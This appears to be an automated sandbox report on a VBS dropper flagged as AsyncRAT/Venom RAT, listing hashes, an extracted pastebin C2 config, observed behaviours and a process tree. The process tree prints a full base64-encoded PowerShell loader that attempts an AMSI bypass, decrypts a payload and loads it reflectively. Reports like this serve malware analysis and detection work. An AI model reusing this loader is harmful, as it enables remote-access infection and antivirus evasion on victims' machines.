Analysis
-
max time kernel
106s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
20-02-2025 15:59
Static task
static1
Behavioral task
behavioral1
Sample
20022025_1553_9491700097082_20250101_20250211_40489.vbs
Resource
win7-20241023-en
General
-
Target
20022025_1553_9491700097082_20250101_20250211_40489.vbs
-
Size
59KB
-
MD5
ed21073856c03d1b0c3690cdc3acae54
-
SHA1
7080a7970f39ebc0928fd1563a39894c1b0b9daa
-
SHA256
8d8048f2936aa8f30891ba0bb4d6710aa4a13c4795122154d2fc5dad85c366d5
-
SHA512
c4948f3039ce07ba5e88eef975c3a3718f13acd2fa49472e0f99aebb2154babc26001391b715043b1670a0eb82a1ebfcee3d0b4ac515e8e1e7000bc51814cec5
-
SSDEEP
768:cMqKvuBXF44i4wbTHDudi0NCefDOZaBZamnDyKp09WB5zMwIZ8ltcYTw2j7ZguRM:wFuqdfDOkbH7FIZySYtj1guT7pvjI
Malware Config
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
FEB 19
cgkwgawwtvsvxsymd
-
delay
1
-
install
false
-
install_folder
%AppData%
-
pastebin_config
https://pastebin.com/raw/Ax2bm8Nk
Signatures
-
Asyncrat family
-
resource yara_rule behavioral2/memory/4804-70-0x0000000005360000-0x0000000005378000-memory.dmp VenomRAT -
Venomrat family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral2/memory/4804-70-0x0000000005360000-0x0000000005378000-memory.dmp family_asyncrat -
Blocklisted process makes network request 3 IoCs
flow pid Process 11 4804 powershell.exe 14 4804 powershell.exe 15 4804 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2720 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2f6aabb7.cmd powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2f6aabb7.cmd powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 13 pastebin.com 14 pastebin.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 4804 powershell.exe 4804 powershell.exe 2720 powershell.exe 2720 powershell.exe 3264 powershell.exe 3264 powershell.exe 4804 powershell.exe 4804 powershell.exe 4804 powershell.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 4804 powershell.exe Token: SeDebugPrivilege 2720 powershell.exe Token: SeDebugPrivilege 3264 powershell.exe Token: SeIncreaseQuotaPrivilege 3264 powershell.exe Token: SeSecurityPrivilege 3264 powershell.exe Token: SeTakeOwnershipPrivilege 3264 powershell.exe Token: SeLoadDriverPrivilege 3264 powershell.exe Token: SeSystemProfilePrivilege 3264 powershell.exe Token: SeSystemtimePrivilege 3264 powershell.exe Token: SeProfSingleProcessPrivilege 3264 powershell.exe Token: SeIncBasePriorityPrivilege 3264 powershell.exe Token: SeCreatePagefilePrivilege 3264 powershell.exe Token: SeBackupPrivilege 3264 powershell.exe Token: SeRestorePrivilege 3264 powershell.exe Token: SeShutdownPrivilege 3264 powershell.exe Token: SeDebugPrivilege 3264 powershell.exe Token: SeSystemEnvironmentPrivilege 3264 powershell.exe Token: SeRemoteShutdownPrivilege 3264 powershell.exe Token: SeUndockPrivilege 3264 powershell.exe Token: SeManageVolumePrivilege 3264 powershell.exe Token: 33 3264 powershell.exe Token: 34 3264 powershell.exe Token: 35 3264 powershell.exe Token: 36 3264 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4804 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 4320 wrote to memory of 2956 4320 WScript.exe 84 PID 4320 wrote to memory of 2956 4320 WScript.exe 84 PID 2956 wrote to memory of 4928 2956 cmd.exe 87 PID 2956 wrote to memory of 4928 2956 cmd.exe 87 PID 4928 wrote to memory of 5036 4928 cmd.exe 89 PID 4928 wrote to memory of 5036 4928 cmd.exe 89 PID 4928 wrote to memory of 4804 4928 cmd.exe 90 PID 4928 wrote to memory of 4804 4928 cmd.exe 90 PID 4928 wrote to memory of 4804 4928 cmd.exe 90 PID 4804 wrote to memory of 2720 4804 powershell.exe 93 PID 4804 wrote to memory of 2720 4804 powershell.exe 93 PID 4804 wrote to memory of 2720 4804 powershell.exe 93 PID 4804 wrote to memory of 3264 4804 powershell.exe 94 PID 4804 wrote to memory of 3264 4804 powershell.exe 94 PID 4804 wrote to memory of 3264 4804 powershell.exe 94
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20022025_1553_9491700097082_20250101_20250211_40489.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4320 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\EWVm.bat2⤵
- Suspicious use of WriteProcessMemory
PID:2956 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\EWVm.bat3⤵
- Suspicious use of WriteProcessMemory
PID:4928 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\EWVm.bat';iex ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("cG93ZXJzaGVsbCAtdyBoaWRkZW47aWV4ICgoJChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnVTFSU1NVNUhVa0ZPUkU5TmFWTlVVa2xPUjFKQlRrUlBUV1ZUVkZKSlRrZFNRVTVFVDAxNElDZ29hVk5VVWtsT1IxSkJUa1JQVFhkVFZGSkpUa2RTUVU1RVQwMXlVMVJTU1U1SFVrRk9SRTlOSUMxVFZGSkpUa2RTUVU1RVQwMVZVMVJTU1U1SFVrRk9SRTlOYzFOVVVrbE9SMUpCVGtSUFRXVlRWRkpKVGtkU1FVNUVUMDFDVTFSU1NVNUhVa0ZPUkU5TllWTlVVa2xPUjFKQlRrUlBUWE5UVkZKSlRrZFNRVTVFVDAxcFUxUlNTVTVIVWtGT1JFOU5ZMU5VVWtsT1IxSkJUa1JQVFZCVFZGSkpUa2RTUVU1RVQwMWhVMVJTU1U1SFVrRk9SRTlOY2xOVVVrbE9SMUpCVGtSUFRYTlRWRkpKVGtkU1FVNUVUMDFwVTFSU1NVNUhVa0ZPUkU5TmJsTlVVa2xPUjFKQlRrUlBUV2RUVkZKSlRrZFNRVTVFVDAwZ0lsTlVVa2xPUjFKQlRrUlBUV2hUVkZKSlRrZFNRVTVFVDAxMGRIQnpVMVJTU1U1SFVrRk9SRTlOT2xOVVVrbE9SMUpCVGtSUFRTOVRWRkpKVGtkU1FVNUVUMDB2VTFSU1NVNUhVa0ZPUkU5Tk1GTlVVa2xPUjFKQlRrUlBUWGhUVkZKSlRrZFNRVTVFVDAwd1UxUlNTVTVIVWtGT1JFOU5MbE5VVWtsT1IxSkJUa1JQVFhOVFZGSkpUa2RTUVU1RVQwMTBVMVJTU1U1SFVrRk9SRTlOTDFOVVVrbE9SMUpCVGtSUFRUaFRWRkpKVGtkU1FVNUVUMDFhVTFSU1NVNUhVa0ZPUkU5TlJGTlVVa2xPUjFKQlRrUlBUV0ZUVkZKSlRrZFNRVTVFVDAwdVUxUlNTVTVIVWtGT1JFOU5kRk5VVWtsT1IxSkJUa1JQVFhoVFZGSkpUa2RTUVU1RVQwMTBVMVJTU1U1SFVrRk9SRTlOSWlrdVEyOXVkR1Z1ZEM1U1pYQnNZV05sS0NkQlFrTW5MQ2NuS1NrZ0xVVnljbTl5UVdOMGFXOXVJRk5wYkdWdWRHeDVRMjl1ZEdsdWRXVTcnKSkpKSAtcmVwbGFjZSAnU1RSSU5HUkFORE9NJywgJycpO3RyeXsgSW52b2tlLVN5c3RlbUFtc2lCeXBhc3MgLURpc2FibGVFVFcgLUVycm9yQWN0aW9uIFN0b3AgfWNhdGNoeyBXcml0ZS1PdXRwdXQgIlRoaXMgc3lzdGVtIGhhcyBhIG1vZGlmaWVkIEFNU0kiIH07ZnVuY3Rpb24gV0xIRE8oJHBhcmFtX3Zhcil7JGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7JGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOyRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzskYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnenJGSVhZVHFrVmxkaHJzZitRek1Oc1dtTVZLUWplc3pHYzNzaEVpVjlxZz0nKTskYWVzX3Zhci5JVj1bU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCc5MGEvR3VUQkIxMUsyRjdUSGhQcnNBPT0nKTskTVpBU1I9JGFlc192YXIuQ3JlYXRlRGVjcnlwdG9yKCk7JEdOSUJDPSRNWkFTUi5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsMCwkcGFyYW1fdmFyLkxlbmd0aCk7JE1aQVNSLkRpc3Bvc2UoKTskYWVzX3Zhci5EaXNwb3NlKCk7JEdOSUJDO31mdW5jdGlvbiBkZWNvbXByZXNzX2Z1bmN0aW9uKCRwYXJhbV92YXIpeyRXRVRWWD1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOyRRS05MVD1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW07JEpHTEJLPU5ldy1PYmplY3QgU3lzdGVtLklPLkNvbXByZXNzaW9uLkdaaXBTdHJlYW0oJFdFVFZYLFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTskSkdMQksuQ29weVRvKCRRS05MVCk7JEpHTEJLLkRpc3Bvc2UoKTskV0VUVlguRGlzcG9zZSgpOyRRS05MVC5EaXNwb3NlKCk7JFFLTkxULlRvQXJyYXkoKTt9JFFXRVdUPVtTeXN0ZW0uSU8uRmlsZV06OlJlYWRMaW5lcyhbQ29uc29sZV06OlRpdGxlKTskcGF5bG9hZDJfdmFyPWRlY29tcHJlc3NfZnVuY3Rpb24gKFdMSERPIChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoW1N5c3RlbS5MaW5xLkVudW1lcmFibGVdOjpFbGVtZW50QXQoJFFXRVdULCA2KS5TdWJzdHJpbmcoMikpKSk7W1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRwYXlsb2FkMl92YXIpLkVudHJ5UG9pbnQuSW52b2tlKCRudWxsLCRudWxsKTtjbGVhcjs="))) "4⤵PID:5036
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe4⤵
- Blocklisted process makes network request
- Drops startup file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4804 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2720
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\EWVm')5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3264
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5928d36ad618a369ffebf44885d07cf81
SHA1edf5a353a919c1873af8e6a0dfafa4c38c626975
SHA256d3436adbbe4dcb701c214f108dcd7babddbbc1b3b6f6dd6f5a4c5fc8c1a507ea
SHA5124ca6f5da3cf41f7ea938eaa80e169ed3ba33c93ada8932d2683c5a57e632b963d0cb84bc6330cb1454801f0fbed02f97c8b8c7bbd992c8fdf603220f2be9086a
-
Filesize
59KB
MD527416502df608008f2adb405d3974c78
SHA1262d35b487ab9223845ba1886e3482e0746e7bc0
SHA2565f5525b99f0e02252ff93f55a6eda3a3b4db4bdf2e969a55c2d83f6befa4fd02
SHA512bc7bd7fa7149142d80b95ddacc152c1ec8e66d384dbfb85a6205beaf547f98dd93c3c6241655a9f484da250aeabe734ff09d99acdece9fc22d5c7f58f94de877
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82